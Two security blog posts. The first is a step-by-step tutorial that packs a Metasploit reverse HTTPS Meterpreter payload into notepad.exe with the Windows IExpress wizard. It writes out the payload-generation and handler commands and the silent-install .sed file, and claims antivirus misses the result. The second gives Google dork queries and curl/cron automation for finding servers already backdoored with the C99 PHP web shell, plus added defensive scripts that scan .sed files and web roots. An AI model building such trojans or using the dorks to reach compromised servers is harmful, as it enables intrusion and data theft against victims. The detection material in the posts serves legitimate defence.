06/04/2012

Knock Knock Who is There?

Intro

This article was posted to show you how ridiculously easy it is to back door almost any executable of your choice without even knowing how to pronounce the word CoMpUtEr. I call this constructive hacking because you literally construct the Trojan Horse using the packer embedded in Windows, without knowing how to program in any programming language, and the worst part is that almost no anti-virus software on the market detects it.

The magical wizard

When I say magical wizard I am referring to the IExpress wizard (obviously very well known to the hacking community for a long time now). The IExpress wizard exists in almost all Windows versions with a default installation. You can use the IExpress Wizard and its command-line options, which come with Windows XP, Windows Server 2003, and Windows Vista, to simplify the creation of a setup program. Using the IExpress Wizard, you can create self-extracting files that automatically run the setup program contained inside. The setup program can be an .inf file or an executable program. IExpress automatically removes the setup files after installation.

Now what is suspicious about that? Of course the fact that you can pack another executable inside any executable you choose. The IExpress Wizard can help you carry out installations of your customized browser package, including details such as determining whether the computer needs to be restarted after installation. You can find the IExpress Wizard (IExpress.exe) in the <systemdrive>:\WINDOWS\system32 folder.

IExpress uses a Self-Extraction Directive (.sed) file to store information about your package. When you run the IExpress Wizard, you can start with an existing .sed file or create a new one by using the wizard. The .sed file contains information and instructions about the setup package.

Running the wizard

A very easy way to start the IExpress wizard is Start --> Run and then type IExpress. If you do that, the IExpress wizard window pops up and asks you to follow a flow of Next-button clicks to achieve your goal.



Step 1: The running IExpress wizard window looks exactly like this:


Step 2: The following window that appears is this one:

 
Note: Notice that I have marked the software version and clicked on the Create new Self Extraction Directive option, which is the one we are going to use for the purpose of this tutorial.

Step 3: The next step will be to click next and get the next wizard window:
    


Note: In this window we choose Extract files and run an installation command, a very important option for our success.

Step 4: And again you can see that the next window asks for the package title (I chose Evil Notepad):


Step 5: In this part we want a non-interactive installation, and for that reason I choose No prompt and click the Next button:



Step 6: Again we want a non-interactive installation (to reduce the user interaction), and for that reason I choose Do not display a license and click the Next button:


Step 7: In the following window we can add the executable we want to back door:



We will now pause the wizard and locate the notepad executable, which by the way is located at %SystemRoot%\system32\notepad.exe; we copy the executable to the desired location in order to insert it.


The notepad.exe before our back door

For this tutorial (as already mentioned) we will use notepad.exe for the demo. Meaning we will back door the notepad executable and explain how to run it (meaning how to fool the victim user into installing it or simply running the infected executable). But first let's have a look at the properties of the executable we are infecting:


Note: Check the Size property of the file; it is 147 KB. Obviously the size of notepad.exe after inserting the Trojan executable is going to increase (or maybe not?).

Generating our Metasploit payload

There is a relatively large number of tutorials on the internet on how to generate the desired payload using the msfpayload utility, and an even larger number of tutorials on how to bypass industry anti-virus software. In my opinion the best malicious payload to generate using Metasploit is the Windows version of the reverse HTTPS Meterpreter shell (meaning of course windows/meterpreter/reverse_https). Reverse HTTPS payloads, after being executed, establish a reverse HTTPS connection back to the attacker's PC (obviously on port 443).

More specifically, the reverse HTTPS shell from Metasploit tunnels communication over HTTP using SSL and injects the Meterpreter server DLL via the Reflective DLL Injection payload (which of course is staged).
  
Step 8: We are now going to use msfpayload to generate our desired executable. We cd to /pentest/exploits/framework2 in BackTrack and then type ./msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai >> ClickOnMe.exe (I also used shikata_ga_nai encoding, but it is not needed). Boom, the executable was generated (named ClickOnMe.exe of course).

The following screen shot shows the options for the specific payload:


The following screen shot shows the generated executable for the specific payload:


If we now run file ClickMe.exe we will see that it is a DOS executable:



Step 9: Then we start our handler on the attacking PC and insert the executable from our PC into the notepad package. So we type:
  1. cd /pentest/exploits/framework3
  2. ./msfconsole  
  3. msf > use exploit/multi/handler
  4. msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_https
  5. msf exploit(handler)> set LHOST sameIPfromBefore
  6. msf exploit(handler)> set LPORT 443
  7. msf exploit(handler)> exploit -j
Now a handler is running on the attacking PC, listening on port 443 for the reverse HTTPS payload. The executable payload is already created, so the next step is to insert the executable into our notepad package.

Inserting the executable into Notepad.exe

Step 10: We now continue from step 7 (having already done steps 8 and 9 of course); the wizard is waiting for us to add the executables, so we add them using the Add button:


Note: As you can see both executable files are now added to the packer.

Step 11: The next step is to "install" notepad.exe (on this occasion notepad obviously does not need to be installed) and then execute ClickOnMe.exe afterwards:


Note: In the install program we put notepad.exe and post install we use the Trojan ClickMe.exe.





Note: In order to achieve a silent installation we choose the No message option.


Note: Again we choose to save the EvilNotepad.exe to a specific file.





Note: The screen shots above show a series of Next clicks to create the package.


The task manager above shows the malicious executable EvilNotepad.exe running. If you now open the file's Properties you will see that the size has increased, even though the package was compressed by 44%. Investigating EvilNotepad.exe further with a tool such as tcpmon will record the Trojan payload attempting to connect back to the attacker's PC.

The configuration file (ending in .sed and named EvilNotepad.sed) shows the exact configuration exported:

[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Documents and Settings\trojan\EvilNotepad.exe
FriendlyName=Evil Notepad
AppLaunched=notepad.exe
PostInstallCmd=ClickOnMe.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="notepad.exe"
FILE1="ClickOnMe.exe"
[SourceFiles]
SourceFiles0=C:\Documents and Settings\jerry\Desktop\
[SourceFiles0]
%FILE0%=
%FILE1%=
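As an added defender's-side example (not part of the original post), a small Python triage script that parses a .sed like the one above and reports what the package launches, what it runs post-install, and whether every prompt is suppressed; the embedded sample is the post's own EvilNotepad.sed trimmed to the sections the script needs.

```python
import configparser
import re

# Constructed sample: the EvilNotepad.sed from the post, trimmed to the
# sections this triage needs ([Options], [Strings], [SourceFiles0]).
SAMPLE_SED = """\
[Options]
HideExtractAnimation=1
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
AppLaunched=notepad.exe
PostInstallCmd=ClickOnMe.exe
FILE0="notepad.exe"
FILE1="ClickOnMe.exe"
[SourceFiles0]
%FILE0%=
%FILE1%=
"""
VAR = re.compile(r"%([A-Za-z0-9_]+)%")  # %Name% references into [Strings]

def parse_sed(text):
    # .sed is INI-style; interpolation off so the literal %Var% values survive
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case (AppLaunched, FILE0, ...)
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}

def resolve(value, strings):
    return VAR.sub(lambda m: strings.get(m.group(1), m.group(0)), value)

def triage(text):
    # Summarise what the package does when the user double-clicks it
    sed = parse_sed(text)
    strings = sed.get("Strings", {})
    opts = {k: resolve(v, strings) for k, v in sed.get("Options", {}).items()}
    files = [resolve(k, strings).strip('"') for s in sed
             if s.startswith("SourceFiles") and s != "SourceFiles" for k in sed[s]]
    silent = (not opts.get("InstallPrompt") and not opts.get("DisplayLicense")
              and not opts.get("FinishMessage") and opts.get("HideExtractAnimation") == "1")
    return {"launched": opts.get("AppLaunched", ""), "post_install": opts.get("PostInstallCmd", ""),
            "files": files, "silent": silent,
            "suspicious": silent and bool(opts.get("PostInstallCmd"))}
```

A package that is fully silent and still runs a second program after the visible one is exactly the shape described in this post, so "suspicious" is the field to alert on.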

Testing it for anti-virus

After generating the package and checking the properties of the file, we see that the size is 193 KB:


Note: Detecting the change to notepad.exe can be achieved by doing regular integrity checks with appropriate software.

Now the next step is to upload it to VirusTotal to see what the anti-virus software can do:

  

Note: As you can see, anti-virus products such as Symantec and SUPERAntiSpyware obviously did not detect the malicious payload.


Epilog

I just showed you that even a person who has almost no clue about computers can generate an effective Trojan horse and obviously steal your credit card or personal data (maybe a jealous boyfriend). Imagine someone using the same methodology to generate Trojan horses combined with social engineering through Facebook or Flickr. I hope I helped you understand the risks.


Reference:

  1. http://technet.microsoft.com/en-us/library/dd346760.aspx 
  2. http://dyn.com/dns/ 
  3. http://www.offensive-security.com/metasploit-unleashed/Msfpayload

04/04/2012

PHP Malware C99 Shell

Intro

This post is about identifying web back doors. Recently I did some research on the PHP malware C99 Shell, and it seems to be very popular among lots of hacking groups and script kiddies.

C99 PHP Shell

C99Shell is a very well designed shell that practically lets you do about anything with the server, if you have the proper access rights. Here is a list with more web back doors; the link given is actually a Google project and it is not going to be accessible through corporate web gateways (with malware filtering, URL filtering or content filtering).

Google Dorks

Nowadays someone would not even have to hack a web server; the only thing they have to do is google for already compromised servers using Google Dorks, and boom, they are already into the compromised machine. Usually the compromised machines found this way are not so interesting, because something that is valuable is better protected (well, not always!) and the Google crawlers will spot it only after a relatively long time. Which means that when you google a web back door and find one, it has already been found many times before you.

To be more specific, a "crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Google's main crawler is called Googlebot. Google's webmaster documentation lists the common Google crawlers you may see in your referrer logs, and how they should be specified in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives.

But if you want more fine-grained control, you can get more specific. For example, you might want all your pages to appear in Google Search, but you don't want images in your personal directory or hidden links such as a web back door to be found and crawled. In this case, you can use robots.txt to disallow the user-agent Googlebot-Image from crawling the files in your /personal directory (while allowing Googlebot to crawl all files), like this:


User-agent: Googlebot
Disallow:

User-agent: Googlebot-Image
Disallow: /personal

Someone can further control how his/her web site is crawled by simply adding directives for different crawlers, like this:

<meta name="robots" content="nofollow"><meta name="googlebot" content="noindex"> 

The truth is that most of the time the web site is going to be crawled and easily googled no matter what you do; an adversary will even be able to reach non-linked pages.

Web Back-door Google-Dorks using Google Alerts

Gaining access to web back doors on already compromised machines is easier than you would think. By simply using Google Alerts you can google all web back doors on the Internet and be notified through your Gmail inbox. The best way to do it is by using the intitle:, intext: and inurl: search engine keywords. For example, in order to google for !C99madShell you simply type in the search:

  1. intitle:!C99madShell
  2. intext: !C99madShell
  3. inurl:backdoor_name.php
Note: If you want to limit the search to your web site you can obviously use the site: keyword. For example you can type intitle:!C99madShell site:www.maiavictim.com and boom, you search only your own web infrastructure.

The following screen shots show how easy it is to automate web back door searching on a daily basis:
 


The best thing to do in every situation, in order to protect yourself from being hacked and not finding out about it, is to regularly check your web infrastructure using Google Alerts. This is also a very good start before you begin a penetration test!! to check for already compromised web infrastructure (I know I am brilliant).


Expand and automate the search using basic scripting


A good thing to do in order to protect yourself from script kiddies is to similarly identify all the web back doors listed at the link mentioned above (the Google project). A very good way to automate the whole process is with scripting!!

So firstly you go to Google and enter intitle:!C99madShell; the Google search will then return this:

  
If you copy the requested URL you will see that it is exactly this one:

https://www.google.co.uk/#hl=en&sugexp=frgbld&gs_nf=1&cp=20&gs_id=4&xhr=t&q=intitle%3A!C99madShell&pf=p&output=search&sclient=psy-ab&oq=intitle:!C99madShell&aq=f&aqi=&aql=&gs_l=&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=f711fce0343c3599&biw=580&bih=425

Now you can use curl to search using Google dorks and save your search results to your hard disk, or simply use Firefox and save the search results with Save As. You can do this with curl in your command prompt by typing:

curl -A Mozilla "http://www.google.com/search?q=C99madSHell" | html2text -width 10000000 | grep "Cached - Similar" | grep "www.*\.php"

The following screen shot shows the command (notice the html2text Linux utility I used):


The outcome of this command will be exactly the one shown below (after all the necessary grepping is done, of course):


As you can see if you enlarge the picture (by simply clicking on the image), the search and filtering performed using curl is redirected into a file (after being properly grepped to obtain only the desired URLs). The output text file contains the potentially compromised web sites. Of course a manual filtering will have to be done to remove the references to URLs that are not really compromised.
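The search-engine approach above only finds what Google has already indexed. As an added example (not part of the original post), here is a Python check that looks at your own web root directly: it compares every PHP file against a hash baseline taken from a known-clean deployment and also greps for the C99 title string the dorks search for. The markers, file extensions and the sample tree are my own assumptions for the demo.

```python
import hashlib
import os
import re
import tempfile

# Signature strings taken from the post: the page title "!C99madShell" the dorks
# search for, and the family name C99Shell.  Case-insensitive on purpose.
MARKERS = [re.compile(p, re.IGNORECASE) for p in (r"c99madshell", r"c99shell")]
PHP_EXT = (".php", ".phtml", ".php5", ".inc")

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def build_baseline(root):
    # Hash every PHP file under root; run this once on a known-clean deployment
    base = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, name)
                base[os.path.relpath(full, root)] = sha256_of(full)
    return base

def scan_webroot(root, baseline):
    # Flag PHP files that are new, modified since the baseline, or carry a marker
    findings = {}
    for rel, digest in build_baseline(root).items():
        reasons = []
        if rel not in baseline:
            reasons.append("not in baseline")
        elif baseline[rel] != digest:
            reasons.append("hash changed")
        with open(os.path.join(root, rel), "rb") as fh:
            text = fh.read().decode("latin-1")  # never fails on binary junk
        reasons += ["marker " + m.pattern for m in MARKERS if m.search(text)]
        if reasons:
            findings[rel] = reasons
    return findings

def demo():
    # Constructed sample tree, not a real site: a clean index plus a dropped shell
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "uploads", "x.php"), "w") as fh:
        fh.write("<html><head><title>!C99madShell</title></head></html>\n")
    baseline = {"index.php": sha256_of(os.path.join(root, "index.php"))}
    return scan_webroot(root, baseline)
```

Running this from cron, in the same way the post schedules the Google search, gives you a nightly report of PHP files that were dropped or modified under your web root.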

Crontabing Google Searches 

The next best thing to do, in order to completely automate the process, is to use crontab; a good crontab tutorial is clickmojo. As you understand after reading this post, the Internet has become quite toxic.

Here is how to run a google dork search at 6PM every night:

MAILTO=cron@youusername.youmailprovider.com
00 18 * * * /usr/bin/curl <google-dork to search> > logSearch.txt


Note: You can grep or sed the obtained data to analyze the results and verify you logged only interesting URLs.

Epilog

The Internet in the last 2 years has become more and more toxic. Even users with no significant information to expose, or small online businesses, are starting to have a hard time maintaining their blogs or web sites without taking security seriously. Please feel free to post comments and give me some feedback on how useful you find my posts.

Reference:
  1. http://support.google.com/webmasters/bin/answer.py?hl=en&answer=1061943
  2. http://www.google.com/alerts 
  3. http://clickmojo.com/code/cron-tutorial.html